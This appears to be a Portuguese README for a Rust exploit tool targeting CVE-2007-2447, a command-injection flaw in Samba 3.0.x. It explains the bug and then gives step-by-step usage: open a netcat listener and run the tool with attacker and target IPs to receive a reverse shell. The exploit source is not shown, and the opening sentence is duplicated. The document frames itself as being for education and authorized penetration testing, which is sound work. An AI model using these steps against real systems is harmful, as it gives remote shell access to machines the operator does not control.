
Uma implementação autônoma em Rust do exploit CVE-2007-2447 que visa o Samba smbd 3.0.20-Debian.
Uma implementação standalone em Rust do exploit CVE-2007-2447 que tem como alvo o Samba smbd 3.0.20-Debian.
CVE-2007-2447 é uma vulnerabilidade de injeção de comandos nas versões 3.0.0 até 3.0.25rc3 do Samba. A vulnerabilidade existe na função SamrChangePassword(), que não sanitiza adequadamente a entrada do usuário, permitindo que atacantes executem comandos arbitrários por meio de metacaracteres de shell no campo de nome de usuário durante a autenticação SMB.
netcat disponível (geralmente instalado por padrão)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Configure um listener netcat
nc -lvnp 4444
# Execute o exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: Endereço IP da sua máquina atacante--lport: Porta para receber a conexão do reverse shell--target: Endereço IP da máquina alvoEsta ferramenta é apenas para fins educacionais e de teste de penetração autorizado. Use com responsabilidade e somente em sistemas que você possua ou tenha permissão explícita para testar.